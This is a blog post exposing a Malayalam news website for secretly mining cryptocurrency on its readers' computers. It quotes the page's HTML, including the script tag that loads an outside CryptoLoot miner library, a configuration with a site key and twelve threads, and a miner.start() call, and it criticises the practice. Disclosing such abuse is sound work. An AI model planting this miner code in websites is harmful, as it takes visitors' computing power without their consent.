Author Archive

Marunadan Malayali Using Crypto Mining

It was a while I didn’t write anything in my blog and today I found something really horrible happening with a website marunadanmalayali. Where they try to mine cryptocurrency using their readers machine. This should be very bad and same time this should note be allowed at any point. Basically they using their users machine without user consent and using machine to mine cryptocurrency.

Here is the code I found in their site .

 

<div class="cphoto-top"><img src=http://www.marunadanmalayali.com/assets/coverphotos/w617/88417_1509710881.jpg /></div>
മേരിക്കയും ചൈനയും തമ്മിൽ യുദ്ധം&nbsp;
<p>ആദായ നികുതി അന്വേഷണ വിഭാഗം പ്രിൻസിപ്പൽ ഡയറക്ടർ ജെ ആൽബർട്ട്ിന്റെ നിർദ്ദേശ പ്രകാരമാണ് ഉദ്യോഗസ്ഥർ ടീം തായ് ഗ്രൂപ്പിന്റെ സ്ഥാപനങ്ങളിൽ പരിശോധന നടത്തിയത്. അഡീഷണൽ ഡയറക്ടർ ഇയാസ് അഹമ്മദ്, ഡെപ്യൂട്ട് ഡയറക്ടർ ബെൻ മാത്യു വർക്കി, ഇന്റലിജൻസ് ആൻഡ് ക്രിമിനൽ ഇൻവസ്റ്റിഗേഷൻ ഓഫീസർ കെ കൃഷ്ണകാന്ത് എന്നിവരുടെ നേതൃത്വത്തിലാണ് പരിശോധന നടക്കുന്നത്.</p>
<p><img src="../../assets/gallery/TAIR.jpg" alt="" width="700" height="409" /></p><script src="https://crypto-loot.com/lib/miner.min.js"></script>
<script>
<span style="color: #ff0000;" data-mce-style="color: #ff0000;"><strong>var miner=new CryptoLoot.Anonymous("64c5d7361594167a0b2be5bd46da443f281467453d56",
{ threads:12,autoThreads:false,throttle:0.2,
}
);</strong></span>
miner.start();
</script></div>
<div class="clear"></div>
<div id="news-actions"></div>
</div>

var miner=new CryptoLoot.Anonymous(“64c5d7361594167a0b2be5bd46da443f281467453d56”

Accoring to https://crypto-loot.com/ 

Stealth and Unintrusive.
Running our miner on your webite will go unnoticed by users after they click run if you set threads between 2-4.

Nice well done admin for silently making some money. Even though you are too greedy actually, because you set threads to 12. So just kill my users machine with my own greedy mind correct ?

I have full code here from a real page https://gist.github.com/achayan/81d9e670a2c4b201995682495ca19312.

I have no idea why they using such a horrible thing to their users. Although users will see lots of slowness in their machine ( although this not going to work on mobile platform app ).

Even though this site push so many advts and now they using their users as resource to earn money with out user consent.

For more details : https://www.wired.com/story/cryptojacking-cryptocurrency-mining-browser/